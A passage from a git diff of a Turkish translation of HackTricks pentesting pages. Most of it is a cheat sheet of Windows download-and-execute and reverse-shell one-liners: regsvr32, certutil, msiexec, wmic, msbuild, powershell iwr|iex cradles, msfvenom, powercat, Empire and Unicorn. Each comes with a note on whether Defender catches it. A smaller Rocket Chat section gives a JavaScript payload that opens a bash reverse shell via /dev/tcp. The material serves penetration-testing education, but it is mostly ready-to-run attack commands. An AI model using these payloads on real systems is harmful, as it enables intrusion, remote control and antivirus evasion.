scrobj.dll +``` +**Defansör tarafından tespit edildi** + +#### Regsvr32 -sct + +[**Buradan**](https://gist.github.com/Arno0x/81a8b43ac386edb7b437fe1408b15da1) +```markup + + + + + + + + +``` +#### **Regsvr32 - Metasploit** +```bash +use multi/script/web_delivery +set target 3 +set payload windows/meterpreter/reverse/tcp +set lhost 10.2.0.5 +run +#You will be given the command to run in the victim: regsvr32 /s /n /u /i:http://10.2.0.5:8080/82j8mC8JBblt.sct scrobj.dll +``` +**Koadic zombisini stager regsvr kullanarak çok kolay bir şekilde indirebilir ve çalıştırabilirsiniz.** + +## Certutil + +* [Buradan](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/) + +Bir B64dll indirin, çözümleyin ve çalıştırın. +```bash +certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 & certutil -decode payload.b64 payload.dll & C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil /logfile= /LogToConsole=false /u payload.dll +``` +B64exe indirin, kodunu çözün ve çalıştırın. +```bash +certutil -urlcache -split -f http://webserver/payload.b64 payload.b64 & certutil -decode payload.b64 payload.exe & payload.exe +``` +**Defansör tarafından tespit edildi** + + +## **Cscript/Wscript** +```bash +powershell.exe -c "(New-Object System.NET.WebClient).DownloadFile('http://10.2.0.5:8000/reverse_shell.vbs',\"$env:temp\test.vbs\");Start-Process %windir%\system32\cscript.exe \"$env:temp\test.vbs\"" +``` +**Cscript - Metasploit** +```bash +msfvenom -p cmd/windows/reverse_powershell lhost=10.2.0.5 lport=4444 -f vbs > shell.vbs +``` +**Defansör tarafından tespit edildi** + +## PS-Bat +```bash +\\webdavserver\folder\batchfile.bat +``` +Ağ çağrısı gerçekleştiren işlem: **svchost.exe**\ +Diskte yazılan yük: **WebDAV istemcisi yerel önbelleği** +```bash +msfvenom -p cmd/windows/reverse_powershell lhost=10.2.0.5 lport=4444 > shell.bat +impacket-smbserver -smb2support kali `pwd` +``` + +```bash +\\10.8.0.3\kali\shell.bat +``` +**Defansör tarafından tespit edildi** + +## **MSIExec** + +Saldırgan +``` +msfvenom -p windows/meterpreter/reverse_tcp lhost=10.2.0.5 lport=1234 -f msi > shell.msi +python -m SimpleHTTPServer 80 +``` +Mağdur: +``` +victim> msiexec /quiet /i \\10.2.0.5\kali\shell.msi +``` +**Tespit Edildi** + +## **Wmic** + +* [Buradan](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/) +```bash +wmic os get /format:"https://webserver/payload.xsl" +``` +Örnek xsl dosyası [buradan](https://gist.github.com/Arno0x/fa7eb036f6f45333be2d6d2fd075d6a7): +```xml + + + + + + + +``` +**Tespit edilmedi** + +**Koadic zombisini stager wmic kullanarak çok kolay bir şekilde indirebilir ve çalıştırabilirsiniz.** + +## Msbuild + +* [Buradan](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/) +``` +cmd /V /c "set MB="C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe" & !MB! /noautoresponse /preprocess \\webdavserver\folder\payload.xml > payload.xml & !MB! payload.xml" +``` +Bu tekniği Uygulama Beyaz Listesi ve Powershell.exe kısıtlamalarını aşmak için kullanabilirsiniz. Bir PS shell ile karşılaşacaksınız.\ +Bunu indirip çalıştırın: [https://raw.githubusercontent.com/Cn33liz/MSBuildShell/master/MSBuildShell.csproj](https://raw.githubusercontent.com/Cn33liz/MSBuildShell/master/MSBuildShell.csproj) +``` +C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe MSBuildShell.csproj +``` +**Tespit edilmedi** + +## **CSC** + +Kurban makinesinde C# kodunu derleyin. +``` +C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /unsafe /out:shell.exe shell.cs +``` +Buradan temel bir C# ters kabuk indirebilirsiniz: [https://gist.github.com/BankSecurity/55faad0d0c4259c623147db79b2a83cc](https://gist.github.com/BankSecurity/55faad0d0c4259c623147db79b2a83cc) + +**Tespit edilmedi** + +## **Regasm/Regsvc** + +* [Buradan](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/) +```bash +C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /u \\webdavserver\folder\payload.dll +``` +**Denemedim** + +[**https://gist.github.com/Arno0x/71ea3afb412ec1a5490c657e58449182**](https://gist.github.com/Arno0x/71ea3afb412ec1a5490c657e58449182) + +## Odbcconf + +* [Buradan](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/) +```bash +odbcconf /s /a {regsvr \\webdavserver\folder\payload_dll.txt} +``` +**Denemedim** + +[**https://gist.github.com/Arno0x/45043f0676a55baf484cbcd080bbf7c2**](https://gist.github.com/Arno0x/45043f0676a55baf484cbcd080bbf7c2) + +## Powershell Shells + +### PS-Nishang + +[https://github.com/samratashok/nishang](https://github.com/samratashok/nishang) + +**Shells** klasöründe birçok farklı shell bulunmaktadır. Invoke-_PowerShellTcp.ps1_ dosyasını indirmek ve çalıştırmak için, scriptin bir kopyasını alın ve dosyanın sonuna ekleyin: +``` +Invoke-PowerShellTcp -Reverse -IPAddress 10.2.0.5 -Port 4444 +``` +Bir web sunucusunda scripti çalıştırmaya başlayın ve bunu kurbanın tarafında yürütün: +``` +powershell -exec bypass -c "iwr('http://10.11.0.134/shell2.ps1')|iex" +``` +Defender bunu kötü niyetli kod olarak tespit etmiyor (henüz, 3/04/2019). + +**YAPILACAK: Diğer nishang shell'lerini kontrol et** + +### **PS-Powercat** + +[**https://github.com/besimorhino/powercat**](https://github.com/besimorhino/powercat) + +İndir, bir web sunucusu başlat, dinleyiciyi başlat ve kurbanın tarafında çalıştır: +``` +powershell -exec bypass -c "iwr('http://10.2.0.5/powercat.ps1')|iex;powercat -c 10.2.0.5 -p 4444 -e cmd" +``` +Defender bunu kötü niyetli kod olarak tespit etmiyor (henüz, 3/04/2019). + +**Powercat tarafından sunulan diğer seçenekler:** + +Bind shell, Ters shell (TCP, UDP, DNS), Port yönlendirme, yükleme/indirme, Payload oluşturma, Dosya sunma... +``` +Serve a cmd Shell: +powercat -l -p 443 -e cmd +Send a cmd Shell: +powercat -c 10.1.1.1 -p 443 -e cmd +Send a powershell: +powercat -c 10.1.1.1 -p 443 -ep +Send a powershell UDP: +powercat -c 10.1.1.1 -p 443 -ep -u +TCP Listener to TCP Client Relay: +powercat -l -p 8000 -r tcp:10.1.1.16:443 +Generate a reverse tcp payload which connects back to 10.1.1.15 port 443: +powercat -c 10.1.1.15 -p 443 -e cmd -g +Start A Persistent Server That Serves a File: +powercat -l -p 443 -i C:\inputfile -rep +``` +### Empire + +[https://github.com/EmpireProject/Empire](https://github.com/EmpireProject/Empire) + +Bir powershell başlatıcısı oluşturun, bir dosyaya kaydedin ve indirin ve çalıştırın. +``` +powershell -exec bypass -c "iwr('http://10.2.0.5/launcher.ps1')|iex;powercat -c 10.2.0.5 -p 4444 -e cmd" +``` +**Kötü niyetli kod olarak tespit edildi** + +### MSF-Unicorn + +[https://github.com/trustedsec/unicorn](https://github.com/trustedsec/unicorn) + +Unicorn kullanarak metasploit arka kapısının bir powershell versiyonunu oluşturun +``` +python unicorn.py windows/meterpreter/reverse_https 10.2.0.5 443 +``` +Oluşturulan kaynak ile msfconsole'ı başlatın: +``` +msfconsole -r unicorn.rc +``` +Bir web sunucusu başlatın ve _powershell\_attack.txt_ dosyasını sunun ve kurban üzerinde çalıştırın: +``` +powershell -exec bypass -c "iwr('http://10.2.0.5/powershell_attack.txt')|iex" +``` +**Kötü amaçlı kod olarak tespit edildi** + +## Daha Fazla + +[PS>Attack](https://github.com/jaredhaight/PSAttack) bazı saldırgan PS modülleri önceden yüklenmiş PS konsolu (şifreli)\ +[https://gist.github.com/NickTyrer/92344766f1d4d48b15687e5e4bf6f9](https://gist.github.com/NickTyrer/92344766f1d4d48b15687e5e4bf6f93c)[\ +WinPWN](https://github.com/SecureThisShit/WinPwn) bazı saldırgan PS modülleri ve proxy tespiti ile PS konsolu (IEX) + +## Referanslar + +* [https://highon.coffee/blog/reverse-shell-cheat-sheet/](https://highon.coffee/blog/reverse-shell-cheat-sheet/) +* [https://gist.github.com/Arno0x](https://gist.github.com/Arno0x) +* [https://github.com/GreatSCT/GreatSCT](https://github.com/GreatSCT/GreatSCT) +* [https://www.hackingarticles.in/get-reverse-shell-via-windows-one-liner/](https://www.hackingarticles.in/get-reverse-shell-via-windows-one-liner/) +* [https://www.hackingarticles.in/koadic-com-command-control-framework/](https://www.hackingarticles.in/koadic-com-command-control-framework/) +* [https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md) +* [https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/) +​ +**Try Hard Security Group** + +
+ +{% embed url="https://discord.gg/tryhardsecurity" %} + +{% hint style="success" %} +AWS Hacking'i öğrenin ve pratik yapın:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +GCP Hacking'i öğrenin ve pratik yapın: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +HackTricks'i Destekleyin + +* [**abonelik planlarını**](https://github.com/sponsors/carlospolop) kontrol edin! +* **💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) katılın ya da **Twitter**'da **bizi takip edin** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Hacking ipuçlarını paylaşmak için [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github reposuna PR gönderin.** + +
+{% endhint %} diff --git a/network-services-pentesting/pentesting-web/rocket-chat.md b/network-services-pentesting/pentesting-web/rocket-chat.md index e63f323f8..9ecb4508a 100644 --- a/network-services-pentesting/pentesting-web/rocket-chat.md +++ b/network-services-pentesting/pentesting-web/rocket-chat.md @@ -1,20 +1,19 @@ # Rocket Chat {% hint style="success" %} -AWS Hacking'i öğrenin ve pratik yapın:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -GCP Hacking'i öğrenin ve pratik yapın: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +AWS Hacking'i öğrenin ve pratik yapın:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +GCP Hacking'i öğrenin ve pratik yapın: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
HackTricks'i Destekleyin * [**abonelik planlarını**](https://github.com/sponsors/carlospolop) kontrol edin! -* **💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) katılın ya da **Twitter'da** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** bizi takip edin.** +* **💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) katılın ya da **Twitter'da** bizi takip edin 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** * **Hacking ipuçlarını paylaşmak için** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github reposuna PR gönderin.
{% endhint %} -{% endhint %}
@@ -29,7 +28,7 @@ Eğer Rocket Chat içinde admin iseniz RCE alabilirsiniz.
-* [belgelere](https://docs.rocket.chat/guides/administration/admin-panel/integrations) göre, her ikisi de verileri işlemek için ES2015 / ECMAScript 6 ([temelde JavaScript](https://codeburst.io/javascript-wtf-is-es6-es8-es-2017-ecmascript-dca859e4821c)) kullanır. Bu yüzden bir [javascript için rev shell](../../generic-methodologies-and-resources/shells/linux.md#nodejs) alalım: +* [belgelere](https://docs.rocket.chat/guides/administration/admin-panel/integrations) göre, her ikisi de verileri işlemek için ES2015 / ECMAScript 6 ([temelde JavaScript](https://codeburst.io/javascript-wtf-is-es6-es8-es-2017-ecmascript-dca859e4821c)) kullanır. Bu yüzden bir [javascript için rev shell](../../generic-methodologies-and-resources/reverse-shells/linux.md#nodejs) alalım: ```javascript const require = console.log.constructor('return process.mainModule.require')(); const { exec } = require('child_process'); @@ -53,9 +52,10 @@ exec("bash -c 'bash -i >& /dev/tcp/10.10.14.4/9001 0>&1'")
{% embed url="https://websec.nl/" %} + {% hint style="success" %} -AWS Hacking'i öğrenin ve pratik yapın:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -GCP Hacking'i öğrenin ve pratik yapın: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) +AWS Hacking'i öğrenin ve pratik yapın:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +GCP Hacking'i öğrenin ve pratik yapın: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
@@ -67,5 +67,3 @@ GCP Hacking'i öğrenin ve pratik yapın: {% endhint %} -
-{% endhint %}